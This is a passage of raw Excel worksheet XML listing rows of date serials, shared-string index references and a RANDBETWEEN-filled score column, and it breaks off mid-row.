    <row r="10066" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10066" s="1">
        <v>43348.066180555557</v>
      </c>
      <c r="C10066" t="s">
        <v>41</v>
      </c>
      <c r="E10066" s="2" t="s">
        <v>8999</v>
      </c>
      <c r="F10066">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10067" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10067" s="1">
        <v>43348.043749999997</v>
      </c>
      <c r="C10067" t="s">
        <v>253</v>
      </c>
      <c r="E10067" s="2" t="s">
        <v>9000</v>
      </c>
      <c r="F10067">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10068" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10068" s="1">
        <v>43347.979398148149</v>
      </c>
      <c r="C10068" t="s">
        <v>73</v>
      </c>
      <c r="E10068" s="2" t="s">
        <v>9001</v>
      </c>
      <c r="F10068">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10069" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10069" s="1">
        <v>43347.828298611108</v>
      </c>
      <c r="C10069" t="s">
        <v>107</v>
      </c>
      <c r="E10069" t="s">
        <v>9002</v>
      </c>
      <c r="F10069">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10070" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10070" s="1">
        <v>43347.807303240741</v>
      </c>
      <c r="C10070" t="s">
        <v>623</v>
      </c>
      <c r="E10070" t="s">
        <v>9003</v>
      </c>
      <c r="F10070">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10071" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A10071" s="1">
        <v>43347.764675925922</v>
      </c>
      <c r="C10071" t="s">
        <v>1611</v>
      </c>
      <c r="D10071" t="s">
        <v>114</v>
      </c>
      <c r="E10071" s="2" t="s">
        <v>9004</v>
      </c>
      <c r="F10071">
        <f t="shared" ca="1" si="157"/>
        <v>5</v>
      </c>
    </row>
    <row r="10072" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10072" s="1">
        <v>43347.744976851849</v>
      </c>
      <c r="C10072" t="s">
        <v>107</v>
      </c>
      <c r="E10072" t="s">
        <v>8901</v>
      </c>
      <c r="F10072">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10073" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10073" s="1">
        <v>43347.682569444441</v>
      </c>
      <c r="C10073" t="s">
        <v>10</v>
      </c>
      <c r="D10073" t="s">
        <v>36</v>
      </c>
      <c r="E10073" s="2" t="s">
        <v>9005</v>
      </c>
      <c r="F10073">
        <f t="shared" ca="1" si="157"/>
        <v>5</v>
      </c>
    </row>
    <row r="10074" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10074" s="1">
        <v>43347.677187499998</v>
      </c>
      <c r="C10074" t="s">
        <v>10</v>
      </c>
      <c r="D10074" t="s">
        <v>151</v>
      </c>
      <c r="E10074" t="s">
        <v>9006</v>
      </c>
      <c r="F10074">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10075" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10075" s="1">
        <v>43347.677083333336</v>
      </c>
      <c r="C10075" t="s">
        <v>10</v>
      </c>
      <c r="D10075" t="s">
        <v>290</v>
      </c>
      <c r="E10075" t="s">
        <v>9007</v>
      </c>
      <c r="F10075">
        <f t="shared" ca="1" si="157"/>
        <v>2</v>
      </c>
    </row>
    <row r="10076" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10076" s="1">
        <v>43347.666087962964</v>
      </c>
      <c r="C10076" t="s">
        <v>10</v>
      </c>
      <c r="D10076" t="s">
        <v>6</v>
      </c>
      <c r="E10076" t="s">
        <v>9008</v>
      </c>
      <c r="F10076">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10077" s="1">
        <v>43347.631620370368</v>
      </c>
      <c r="C10077" t="s">
        <v>10</v>
      </c>
      <c r="D10077" t="s">
        <v>192</v>
      </c>
      <c r="E10077" t="s">
        <v>9009</v>
      </c>
      <c r="F10077">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10078" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10078" s="1">
        <v>43347.624155092592</v>
      </c>
      <c r="C10078" t="s">
        <v>10</v>
      </c>
      <c r="D10078" t="s">
        <v>6</v>
      </c>
      <c r="E10078" s="2" t="s">
        <v>9010</v>
      </c>
      <c r="F10078">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10079" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10079" s="1">
        <v>43347.610520833332</v>
      </c>
      <c r="C10079" t="s">
        <v>10</v>
      </c>
      <c r="D10079" t="s">
        <v>23</v>
      </c>
      <c r="E10079" t="s">
        <v>9011</v>
      </c>
      <c r="F10079">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10080" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10080" s="1">
        <v>43347.555335648147</v>
      </c>
      <c r="C10080" t="s">
        <v>260</v>
      </c>
      <c r="E10080" t="s">
        <v>9012</v>
      </c>
      <c r="F10080">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10081" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10081" s="1">
        <v>43347.552824074075</v>
      </c>
      <c r="C10081" t="s">
        <v>10</v>
      </c>
      <c r="D10081" t="s">
        <v>36</v>
      </c>
      <c r="E10081" t="s">
        <v>9013</v>
      </c>
      <c r="F10081">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10082" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10082" s="1">
        <v>43347.514710648145</v>
      </c>
      <c r="C10082" t="s">
        <v>6</v>
      </c>
      <c r="D10082" t="s">
        <v>25</v>
      </c>
      <c r="E10082" t="s">
        <v>9014</v>
      </c>
      <c r="F10082">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10083" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10083" s="1">
        <v>43347.493206018517</v>
      </c>
      <c r="C10083" t="s">
        <v>48</v>
      </c>
      <c r="E10083" s="2" t="s">
        <v>9015</v>
      </c>
      <c r="F10083">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10084" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10084" s="1">
        <v>43347.488125000003</v>
      </c>
      <c r="C10084" t="s">
        <v>10</v>
      </c>
      <c r="D10084" t="s">
        <v>41</v>
      </c>
      <c r="E10084" t="s">
        <v>9016</v>
      </c>
      <c r="F10084">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10085" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10085" s="1">
        <v>43347.474027777775</v>
      </c>
      <c r="C10085" t="s">
        <v>10</v>
      </c>
      <c r="D10085" t="s">
        <v>36</v>
      </c>
      <c r="E10085" t="s">
        <v>9017</v>
      </c>
      <c r="F10085">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10086" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10086" s="1">
        <v>43347.468587962961</v>
      </c>
      <c r="C10086" t="s">
        <v>10</v>
      </c>
      <c r="D10086" t="s">
        <v>36</v>
      </c>
      <c r="E10086" t="s">
        <v>9018</v>
      </c>
      <c r="F10086">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10087" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A10087" s="1">
        <v>43347.465949074074</v>
      </c>
      <c r="C10087" t="s">
        <v>10</v>
      </c>
      <c r="E10087" s="2" t="s">
        <v>9019</v>
      </c>
      <c r="F10087">
        <f t="shared" ca="1" si="157"/>
        <v>5</v>
      </c>
    </row>
    <row r="10088" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10088" s="1">
        <v>43347.434467592589</v>
      </c>
      <c r="C10088" t="s">
        <v>41</v>
      </c>
      <c r="E10088" t="s">
        <v>9020</v>
      </c>
      <c r="F10088">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10089" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10089" s="1">
        <v>43347.416932870372</v>
      </c>
      <c r="C10089" t="s">
        <v>10</v>
      </c>
      <c r="D10089" t="s">
        <v>20</v>
      </c>
      <c r="E10089" s="2" t="s">
        <v>9021</v>
      </c>
      <c r="F10089">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10090" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10090" s="1">
        <v>43347.411562499998</v>
      </c>
      <c r="C10090" t="s">
        <v>71</v>
      </c>
      <c r="D10090" t="s">
        <v>67</v>
      </c>
      <c r="E10090" s="2" t="s">
        <v>9022</v>
      </c>
      <c r="F10090">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10091" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10091" s="1">
        <v>43347.410393518519</v>
      </c>
      <c r="C10091" t="s">
        <v>10</v>
      </c>
      <c r="D10091" t="s">
        <v>112</v>
      </c>
      <c r="E10091" s="2" t="s">
        <v>9023</v>
      </c>
      <c r="F10091">
        <f t="shared" ca="1" si="157"/>
        <v>2</v>
      </c>
    </row>
    <row r="10092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10092" s="1">
        <v>43347.401180555556</v>
      </c>
      <c r="C10092" t="s">
        <v>260</v>
      </c>
      <c r="D10092" t="s">
        <v>1036</v>
      </c>
      <c r="E10092" t="s">
        <v>4793</v>
      </c>
      <c r="F10092">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10093" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10093" s="1">
        <v>43347.393611111111</v>
      </c>
      <c r="C10093" t="s">
        <v>10</v>
      </c>
      <c r="D10093" t="s">
        <v>178</v>
      </c>
      <c r="E10093" t="s">
        <v>9024</v>
      </c>
      <c r="F10093">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10094" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10094" s="1">
        <v>43347.380231481482</v>
      </c>
      <c r="C10094" t="s">
        <v>48</v>
      </c>
      <c r="E10094" s="2" t="s">
        <v>9025</v>
      </c>
      <c r="F10094">
        <f t="shared" ca="1" si="157"/>
        <v>2</v>
      </c>
    </row>
    <row r="10095" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10095" s="1">
        <v>43347.36859953704</v>
      </c>
      <c r="C10095" t="s">
        <v>48</v>
      </c>
      <c r="E10095" s="2" t="s">
        <v>9026</v>
      </c>
      <c r="F10095">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10096" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10096" s="1">
        <v>43347.361481481479</v>
      </c>
      <c r="C10096" t="s">
        <v>8872</v>
      </c>
      <c r="E10096" s="2" t="s">
        <v>9027</v>
      </c>
      <c r="F10096">
        <f t="shared" ca="1" si="157"/>
        <v>2</v>
      </c>
    </row>
    <row r="10097" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10097" s="1">
        <v>43347.354004629633</v>
      </c>
      <c r="C10097" t="s">
        <v>318</v>
      </c>
      <c r="E10097" t="s">
        <v>1446</v>
      </c>
      <c r="F10097">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10098" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10098" s="1">
        <v>43347.319085648145</v>
      </c>
      <c r="C10098" t="s">
        <v>48</v>
      </c>
      <c r="E10098" t="s">
        <v>9028</v>
      </c>
      <c r="F10098">
        <f t="shared" ca="1" si="157"/>
        <v>5</v>
      </c>
    </row>
    <row r="10099" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10099" s="1">
        <v>43347.316724537035</v>
      </c>
      <c r="C10099" t="s">
        <v>48</v>
      </c>
      <c r="E10099" s="2" t="s">
        <v>9029</v>
      </c>
      <c r="F10099">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10100" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10100" s="1">
        <v>43347.261874999997</v>
      </c>
      <c r="C10100" t="s">
        <v>71</v>
      </c>
      <c r="E10100" s="2" t="s">
        <v>9030</v>
      </c>
      <c r="F10100">
        <f t="shared" ca="1" si="157"/>
        <v>5</v>
      </c>
    </row>
    <row r="10101" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10101" s="1">
        <v>43347.250335648147</v>
      </c>
      <c r="C10101" t="s">
        <v>71</v>
      </c>
      <c r="E10101" s="2" t="s">
        <v>9031</v>
      </c>
      <c r="F10101">
        <f t="shared" ca="1" si="157"/>
        <v>2</v>
      </c>
    </row>
    <row r="10102" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A10102" s="1">
        <v>43347.23710648148</v>
      </c>
      <c r="C10102" t="s">
        <v>48</v>
      </c>
      <c r="E10102" s="2" t="s">
        <v>9032</v>
      </c>
      <c r="F10102">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10103" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10103" s="1">
        <v>43347.216724537036</v>
      </c>
      <c r="C10103" t="s">
        <v>253</v>
      </c>
      <c r="E10103" s="2" t="s">
        <v>9033</v>
      </c>
      <c r="F10103">
        <f t="shared" ca="1" si="157"/>
        <v>5</v>
      </c>
    </row>
    <row r="10104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10104" s="1">
        <v>43347.212523148148</v>
      </c>
      <c r="C10104" t="s">
        <v>73</v>
      </c>
      <c r="E10104" t="s">
        <v>9034</v>
      </c>
      <c r="F10104">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10105" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10105" s="1">
        <v>43347.20826388889</v>
      </c>
      <c r="C10105" t="s">
        <v>71</v>
      </c>
      <c r="E10105" s="2" t="s">
        <v>9035</v>
      </c>
      <c r="F10105">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10106" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10106" s="1">
        <v>43347.202291666668</v>
      </c>
      <c r="C10106" t="s">
        <v>41</v>
      </c>
      <c r="E10106" s="2" t="s">
        <v>9036</v>
      </c>
      <c r="F10106">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10107" s="1">
        <v>43347.189814814818</v>
      </c>
      <c r="C10107" t="s">
        <v>559</v>
      </c>
      <c r="F10107">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10108" s="1">
        <v>43347.1715625</v>
      </c>
      <c r="C10108" t="s">
        <v>73</v>
      </c>
      <c r="E10108" t="s">
        <v>9037</v>
      </c>
      <c r="F10108">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10109" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10109" s="1">
        <v>43347.170752314814</v>
      </c>
      <c r="C10109" t="s">
        <v>73</v>
      </c>
      <c r="F10109">
        <f t="shared" ca="1" si="157"/>
        <v>1</v>
      </c>
    </row>
    <row r="10110" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A10110" s="1">
        <v>43347.147951388892</v>
      </c>
      <c r="C10110" t="s">
        <v>253</v>
      </c>
      <c r="D10110" t="s">
        <v>312</v>
      </c>
      <c r="E10110" s="2" t="s">
        <v>9038</v>
      </c>
      <c r="F10110">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10111" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10111" s="1">
        <v>43347.128796296296</v>
      </c>
      <c r="C10111" t="s">
        <v>48</v>
      </c>
      <c r="E10111" s="2" t="s">
        <v>9039</v>
      </c>
      <c r="F10111">
        <f t="shared" ca="1" si="157"/>
        <v>2</v>
      </c>
    </row>
    <row r="10112" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10112" s="1">
        <v>43347.108263888891</v>
      </c>
      <c r="C10112" t="s">
        <v>314</v>
      </c>
      <c r="E10112" t="s">
        <v>9040</v>
      </c>
      <c r="F10112">
        <f t="shared" ca="1" si="157"/>
        <v>4</v>
      </c>
    </row>
    <row r="10113" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10113" s="1">
        <v>43346.957372685189</v>
      </c>
      <c r="C10113" t="s">
        <v>6</v>
      </c>
      <c r="D10113" t="s">
        <v>25</v>
      </c>
      <c r="E10113" s="2" t="s">
        <v>9041</v>
      </c>
      <c r="F10113">
        <f t="shared" ca="1" si="157"/>
        <v>3</v>
      </c>
    </row>
    <row r="10114" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10114" s="1">
        <v>43346.918773148151</v>
      </c>
      <c r="C10114" t="s">
        <v>41</v>
      </c>
      <c r="E10114" t="s">
        <v>9042</v>
      </c>
      <c r="F10114">
        <f t="shared" ref="F10114:F10177" ca="1" si="158">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="10115" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10115" s="1">
        <v>43346.878101851849</v>
      </c>
      <c r="C10115" t="s">
        <v>10</v>
      </c>
      <c r="D10115" t="s">
        <v>17</v>
      </c>
      <c r="E10115" t="s">
        <v>9043</v>
      </c>
      <c r="F10115">
        <f t="shared" ca="1" si="158"/>
        <v>3</v>
      </c>
    </row>
    <row r="10116" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10116" s="1">
        <v>43346.822268518517</v>
      </c>
      <c r="C10116" t="s">
        <v>140</v>
      </c>
      <c r="D10116" t="s">
        <v>141</v>
      </c>
      <c r="E10116" s="2" t="s">
        <v>9044</v>
      </c>
      <c r="F10116">
        <f t="shared" ca="1" si="158"/>
        <v>3</v>
      </c>
    </row>
    <row r="10117" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10117" s="1">
        <v>43346.702916666669</v>
      </c>
      <c r="C10117" t="s">
        <v>10</v>
      </c>
      <c r="D10117" t="s">
        <v>89</v>
      </c>
      <c r="E10117" t="s">
        <v>9045</v>
      </c>
      <c r="F10117">
        <f t="shared" ca="1" si="158"/>
        <v>5</v>
      </c>
    </row>
    <row r="10118" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10118" s="1">
        <v>43346.6796875</v>
      </c>
      <c r="C10118" t="s">
        <v>16</v>
      </c>
      <c r="E10118" t="s">
        <v>9046</v>
      </c>
      <c r="F10118">
        <f t="shared" ca="1" si="158"/>
        <v>2</v>
      </c>
    </row>
    <row r="10119" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10119" s="1">
        <v>43346.649050925924</v>
      </c>
      <c r="C10119" t="s">
        <v>260</v>
      </c>
      <c r="E10119" t="s">
        <v>9047</v>
      </c>
      <c r="F10119">
        <f t="shared" ca="1" si="158"/>
        <v>5</v>
      </c>
    </row>
    <row r="10120" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10120" s="1">
        <v>43346.602060185185</v>
      </c>
      <c r="C10120" t="s">
        <v>16</v>
      </c>
      <c r="E10120" t="s">
        <v>9048</v>
      </c>
      <c r="F10120">
        <f t="shared" ca="1" si="158"/>
        <v>2</v>
      </c>
    </row>
    <row r="10121" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10121" s="1">
        <v>43346.584594907406</v>
      </c>
      <c r="C10121" t="s">
        <v>50</v>
      </c>
      <c r="F10121">
        <f t="shared" ca="1" si="158"/>
        <v>1</v>
      </c>
    </row>
    <row r="10122" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10122" s="1">
        <v>43346.523553240739</v>
      </c>
      <c r="C10122" t="s">
        <v>290</v>
      </c>
      <c r="E10122" s="2" t="s">
        <v>9049</v>
      </c>
      <c r="F10122">
        <f t="shared" ca="1" si="158"/>
        <v>4</v>
      </c>
    </row>
    <row r="10123" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A10123" s="1">
        <v>43346.378796296296</v>
      </c>
      <c r="C10123" t="s">
        <v>7419</v>
      </c>
      <c r="E10123" s="2" t="s">
        <v>9050</v>
      </c>
      <c r="F10123">
        <f t="shared" ca="1" si="158"/>
        <v>3</v>
      </c>
    </row>
    <row r="10124" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10124" s="1">
        <v>43346.353993055556</v>
      </c>
      <c r="C10124" t="s">
        <v>10</v>
      </c>
      <c r="D10124" t="s">
        <v>23</v>
      </c>
      <c r="E10124" s="2" t="s">
        <v>9051</v>
      </c>
      <c r="F10124">
        <f t="shared" ca="1" si="158"/>
        <v>2</v>
      </c>
    </row>
    <row r="10125" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A10125" s="1">
        <v>43346.344270833331</v>
      </c>
      <c r="C10125" t="s">
        <v>71</v>
      </c>
      <c r="E10125" s="2" t="s">
        <v>9052</v>
      </c>
      <c r="F10125">
        <f t="shared" ca="1" si="158"/>
        <v>1</v>
      </c>
    </row>
    <row r="10126" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10126" s="1">
        <v>43346.34170138889</v>
      </c>
      <c r="C10126" t="s">
        <v>65</v>
      </c>
      <c r="E10126" t="s">
        <v>9053</v>
      </c>
      <c r="F10126">
        <f t="shared" ca="1" si="158"/>
        <v>1</v>
      </c>
    </row>
    <row r="10127" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10127" s="1">
        <v>43346.330300925925</v>
      </c>
      <c r="C10127" t="s">
        <v>41</v>
      </c>
      <c r="E10127" s="2" t="s">
        <v>9054</v>
      </c>
      <c r="F10127">
        <f t="shared" ca="1" si="158"/>
        <v>2</v>
      </c>
    </row>
    <row r="10128" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10128" s="1">
        <v>43346.319016203706</v>
      </c>
      <c r="C10128" t="s">
        <v>10</v>
      </c>
      <c r="D10128" t="s">
        <v>290</v>
      </c>
      <c r="E10128" t="s">
        <v>9055</v>
      </c>
      <c r="F10128">
        <f t="shared" ca="1" si="158"/>
        <v>5</v>
      </c>
    </row>
    <row r="10129" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A10129" s="1">
        <v>43346.299340277779</v>
      </c>
      <c r="C10129" t="s">
        <v>48</v>
      </c>
      <c r="E10129" s="2" t="s">
        <v>9056</v>
      </c>
      <c r="F10129">
        <f t="shared" ca="1" si="158"/>
        <v>5</v>
      </c>
    </row>
    <row r="10130" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10130" s="1">
        <v>43346.293298611112</v>
      </c>
      <c r="C10130" t="s">
        <v>410</v>
      </c>
      <c r="D10130" t="s">
        <v>312</v>
      </c>
      <c r="E10130" t="s">
        <v>9057</v>
      </c>
      <c r="F10130">
        <f t="shared" ca="1" si="158"/>
        <v>3</v>
      </c>
    </row>
    <row r="10131" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10131" s="1">
        <v>43346.258750000001</v>
      </c>
      <c r="C10131" t="s">
        <v>314</v>
      </c>
      <c r="E10131" s="2" t="s">
        <v>9058</v>
      </c>
      <c r="F10131">
        <f t="shared" ca="1" si="158"/>
        <v>1</v>
      </c>
    </row>
    <row r="10132" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A10132" s="1">
        <v>43346.246400462966</v>
      </c>
      <c r="C10132" t="s">
        <v>253</v>
      </c>
      <c r="E10132" s="2" t="s">
        <v>9059</v>
      </c>
      <c r="F10132">
        <f t="shared" ca="1" si="158"/>
        <v>1</v>
      </c>
    </row>
    <row r="10133" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A10133" s="1">
        <v>43346.228807870371</v>
      </c>
      <c r="C10133" t="s">
        <v>48</v>
      </c>
      <c r="E10133" s="2" t="s">
        <v>9060</v>
      </c>
      <c r="F10133">
        <f t="shared" ca="1" si="158"/>
        <v>3</v>
      </c>
    </row>
    <row r="10134" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10134" s="1">
        <v>43346.228206018517</v>
      </c>
      <c r="C10134" t="s">
        <v>461</v>
      </c>
      <c r="E10134" s="2" t="s">
        <v>9061</v>
      </c>
      <c r="F10134">
        <f t="shared" ca="1" si="158"/>
        <v>4</v>
      </c>
    </row>
    <row r="10135" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A10135" s="1">
        <v>43346.192650462966</v>
      </c>
      <c r="C10135" t="s">
        <v>253</v>
      </c>
      <c r="E10135" s="2" t="s">
        <v>9062</v>
      </c>
      <c r="F10135">
        <f t="shared" ca="1" si="158"/>
        <v>5</v>
      </c>
    </row>
    <row r="10136" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10136" s="1">
        <v>43346.184351851851</v>
      </c>
      <c r="C10136" t="s">
        <v>41</v>
      </c>
      <c r="E10136" t="s">
        <v>1446</v>
      </c>
      <c r="F10136">
        <f t="shared" ca="1" si="158"/>
        <v>2</v>
      </c>
    </row>
    <row r="10137" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10137" s="1">
        <v>43346.177685185183</v>
      </c>
      <c r="C10137" t="s">
        <v>535</v>
      </c>
      <c r="E10137" s="2" t="s">
        <v>9063</v>
      </c>
      <c r="F10137">
        <f t="shared" ca="1" si="158"/>
        <v>5</v>
      </c>
    </row>
    <row r="10138" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10138" s="1">
        <v>43346.155173611114</v>
      </c>
      <c r="C10138" t="s">
        <v>9064</v>
      </c>
      <c r="E10138" s="2" t="s">
        <v>9065</v>
      </c>
      <c r="F10138">
        <f t="shared" ca="1" si="158"/>
        <v>1</v>
      </c>
    </row>
    <row r="10139" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10139" s="1">
        <v>43346.141412037039</v>
      </c>
      <c r="C10139" t="s">
        <v>41</v>
      </c>
      <c r="E10139" s="2" t="s">
        <v>9066</v>
      </c>
      <c r="F10139">
        <f t="shared" ca="1" si="158"/>
        <v>3</v>
      </c>
    </row>
    <row r="10140" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10140" s="1">
        <v>43346.102523148147</v>
      </c>
      <c r="C10140" t="s">
        <v>41</v>
      </c>
      <c r="E10140" t="s">
        <v>9067</v>
      </c>
      <c r="F10140">
        <f t="shared" ca="1" si="158"/>
        <v>4</v>
      </c>
    </row>
    <row r="10141" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10141" s="1">
        <v>43346.101840277777</v>
      </c>
      <c r="C10141" t="s">
        <v>318</v>
      </c>
      <c r="E10141" s="2" t="s">
        <v>9068</v>
      </c>
      <c r="F10141">
        <f t="shared" ca="1" si="158"/>
        <v>3</v>
      </c>
    </row>
    <row r="10142" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10142" s="1">
        <v>43346.098344907405</v>
      </c>
      <c r="C10142" t="s">
        <v>48</v>
      </c>
      <c r="E10142" s="2" t="s">
        <v>9069</v>
      </c>
      <c r="F10142">
        <f t="shared" ca="1" si="158"/>
        <v>1</v>
      </c>
    </row>
    <row r="10143" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10143" s="1">
        <v>43346.08016203704</v>
      </c>
      <c r="C10143" t="s">
        <v>41</v>
      </c>
      <c r="E10143" s="2" t="s">
        <v>9070</v>
      </c>
      <c r="F10143">
        <f t="shared" ca="1" si="158"/>
        <v>3</v>
      </c>
    </row>
    <row r="10144" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10144" s="1">
        <v>43346.048067129632</v>
      </c>
      <c r="C10144" t="s">
        <v>10</v>
      </c>
      <c r="D10144" t="s">
        <v>11</v>
      </c>
      <c r="E10144" s="2" t="s">
        <v>9071</v>
      </c>
      <c r="F10144">
        <f t="shared" ca="1" si="158"/>
        <v>1</v>
      </c>
    </row>
    <row r="10145" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10145" s="1">
        <v>43346.038055555553</v>
      </c>
      <c r="C10145" t="s">
        <v>73</v>
      </c>
      <c r="E10145" t="s">
        <v>9072</v>
      </c>
      <c r="F10145">
        <f t="shared" ca="1" si="158"/>
        <v>4</v>
      </c>
    </row>
    <row r="10146" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10146" s="1">
        <v>43346.031944444447</v>
      </c>
      <c r="C10146" t="s">
        <v>139</v>
      </c>
      <c r="E10146" s="2" t="s">
        <v>9073</v>
      </c>
      <c r="F10146">
        <f t="shared" ca="1" si="158"/>
        <v>4</v>
      </c>
    </row>
    <row r="10147" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10147" s="1">
